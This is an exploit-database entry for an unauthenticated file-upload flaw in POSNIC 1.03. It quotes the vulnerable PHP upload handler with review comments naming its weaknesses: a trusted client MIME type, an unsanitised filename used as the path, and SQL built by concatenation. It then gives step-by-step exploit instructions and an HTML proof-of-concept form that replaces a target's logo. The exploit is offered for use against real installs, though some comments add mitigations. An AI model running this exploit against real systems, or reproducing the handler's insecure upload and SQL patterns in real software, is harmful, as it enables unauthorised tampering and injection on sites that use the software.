POSNIC 1.03 Shell Upload Exploit

2017-02-08T00:00:00
ID 1337DAY-ID-26929
Type zdt
Reporter Rony Das
Modified 2017-02-08T00:00:00

Description

POSNIC version 1.03 suffers from a remote shell upload vulnerability.

                                        
                                            <!--
# Exploit Title: POSNIC Unauthenticated File Upload
# Date: 04-02-2017
# Exploit Author: Rony Das
# Vendor Homepage: http://www.posnic.com
# Software Link: https://github.com/Posnic/POSNIC-1.03
# Version: 1.03
# Tested on: Ubuntu 14.04
-->

<!-- 
VULNERABLE CODE: /update_details.php

// Upload handler quoted from update_details.php (fragment; the closing braces are not part of the quote).
// NOTE(review): no authentication or session check is visible before this block — confirm against the full file.
<if (isset($_POST['submit']) and $_POST['submit'] === 'Submit') {

    $allowedExts = array("gif", "jpeg", "jpg", "png");
    // Extension is whatever follows the last "." of the client-supplied name; in_array() is non-strict here.
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    // $_FILES[...]["type"] is the MIME type declared by the client, not derived from the file content,
    // so the client can set it freely; the size and extension checks are the only constraints that hold.
    if ((($_FILES["file"]["type"] == "image/gif")
            || ($_FILES["file"]["type"] == "image/png"))
        && ($_FILES["file"]["size"] < 30000)
        && in_array($extension, $allowedExts)
    ) {
        if ($_FILES["file"]["error"] > 0) {
            echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
        } else {
            // Both values are taken verbatim from the request.
            $upload = $_FILES["file"]["name"];
            $type = $_FILES["file"]["type"];


            // The existence check looks under upload/, but unlink() is given the bare filename,
            // so the two calls refer to different paths.
            if (file_exists("upload/" . $_FILES["file"]["name"])) {

                unlink($upload);
            }


            // The client-supplied name is used as the destination path unchanged; only its extension was checked,
            // and the return value of move_uploaded_file() is not inspected.
            // Mitigation: store under a server-generated name and validate the content (e.g. getimagesize()).
            $name = $_FILES["file"]["name"];
            move_uploaded_file($_FILES["file"]["tmp_name"],
                "upload/" . $name);
            //echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
            $upload; // no-op statement
            $_SESSION['logo'] = $upload;

            # Note that filters and validators are separate rule sets and method calls. There is a good reason for this.

            // Filename and declared MIME type are concatenated straight into the SQL string;
            // this should be a prepared statement with bound parameters.
            $db->query("UPDATE store_details  SET log ='" . $upload . "',type='" . $type . "'");

-->



<!-- Exploit -->
<!-- 
Set the form's action to "http://yourtarget.com/posnicdirectory/update_details.php",
then choose an image file and rename it to "posnic.png". This replaces the LOGO
(it is not overwritten in place): the handler deletes the file if one with that name already
exists and then stores the newly uploaded file.

//if (file_exists("upload/" . $_FILES["file"]["name"])) {

//                unlink($upload);
//            }
-->

<center>
<!-- Proof-of-concept request: a plain multipart POST carrying the "file" and "submit" fields the handler reads.
     Server-side mitigation: require an authenticated session and an anti-CSRF token on update_details.php,
     and never use the client-supplied filename as the storage path. -->
<form action="http://localhost/posnic/update_details.php" method="POST" enctype="multipart/form-data">
            <p>Upload Logo</p>
            <input type="file" name="file" id="file"><br><br><br>
            <input type="submit" name="submit" value="Submit">
</form>
